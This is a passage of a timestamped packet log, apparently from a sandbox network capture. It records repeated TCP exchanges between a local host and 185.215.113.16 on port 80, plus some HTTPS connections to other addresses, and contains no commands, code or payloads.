                                                                                                                                                                              Nov 21, 2024 08:30:38.504170895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.504314899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.504365921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.505002022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.505069971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.505135059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.505810022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.505938053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.505991936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.506613016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.506762028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.506818056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.507469893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.507513046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.507596970 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.508263111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.508328915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.508444071 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.509092093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.509224892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.509464025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.509898901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.509985924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.510132074 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.510729074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.510848999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.510900021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.511559010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.511801958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.511878014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.512360096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.512391090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.512474060 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.513175011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.513253927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.513376951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.513978958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.514082909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.514131069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.514806032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.514923096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.514966965 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.515631914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.515861988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.515913963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.516433954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.516554117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.516597986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.517280102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.517349005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.517448902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.518089056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.518203020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.518264055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.518899918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.519026995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.519088030 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.519709110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.519830942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.519880056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.520510912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.520601988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.520646095 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.521333933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.521457911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.521517992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.522145033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.522270918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.522445917 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.522954941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.523039103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.523130894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.523781061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.523890972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.524466991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.524614096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.524708986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.524753094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.525425911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.525537968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.525597095 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.526231050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.526348114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.526395082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.527074099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.527195930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.527267933 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.527859926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.527993917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.528038979 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.528692961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.528811932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.528868914 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.529505968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.529617071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.529661894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.530307055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.575865030 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.683348894 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.683423996 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.683496952 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:38.683840036 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:38.683856964 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.686954021 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:38.686990023 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.687047005 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:38.687416077 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:38.687429905 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.689466000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.689529896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.689601898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.689656973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.689825058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.689876080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.690493107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.690613031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.690656900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.691304922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.691433907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.691494942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.692138910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.692259073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.692312002 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.692956924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.693010092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.693052053 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.693763971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.694041014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.694230080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.694613934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.694781065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.694875956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.695384026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.695481062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.695529938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.696383953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.696436882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.696491003 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.697077036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.697226048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.697318077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.697853088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.698040962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.698092937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.698677063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.698750019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.698798895 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.699521065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.699646950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.699713945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.700294971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.700388908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.700583935 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.701164007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.701268911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.701316118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.701999903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.702178955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.702229977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.702760935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.702850103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.702914953 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.703622103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.703769922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.703907967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.704430103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.704611063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.704658985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.705229998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.705321074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.705385923 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.706031084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.706181049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.706244946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.706840992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.706964970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.707082033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.707680941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.707817078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.707904100 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.708498001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.708640099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.708838940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.709285975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.709409952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.709579945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.710144043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.710356951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.710417986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.710926056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.711055994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.711143017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.711719036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.711862087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.712013006 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.712568998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.712676048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.712723970 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.713397980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.713488102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.713628054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.714190006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.714397907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.714449883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.715037107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.715341091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.715637922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.715837955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.715960979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.716259956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.716677904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.716794014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.716873884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.717483997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.717603922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.717650890 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.718286991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.718426943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.718571901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.719094992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.719149113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.719270945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.719913960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.720020056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.720066071 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.720753908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.720911026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.720966101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.721558094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.721642971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.721688986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.722368002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.722454071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.722507000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.723237991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.723402023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.723445892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.724020004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.724167109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.724225044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.724837065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.724992037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.725084066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.725672007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.725755930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.725815058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.726541042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.726667881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.727178097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.727277994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.727471113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.727516890 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.728116989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.728224993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.728276014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.728931904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.729042053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.729207993 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.729727983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.729783058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.729870081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.730587006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.730698109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.730869055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.731374025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.731458902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.731506109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.732175112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.750614882 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.750682116 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:38.753895044 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:38.753902912 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.754179955 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.755841970 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:38.755887032 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:38.755892992 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.756031036 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:38.778980970 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.799346924 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.890670061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.890743971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.890806913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.891002893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.891210079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.891246080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.891275883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.891982079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.892067909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.892098904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.892781973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.892851114 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.892891884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.893593073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.893687963 CET8049762185.215.113.16192.168.2.6
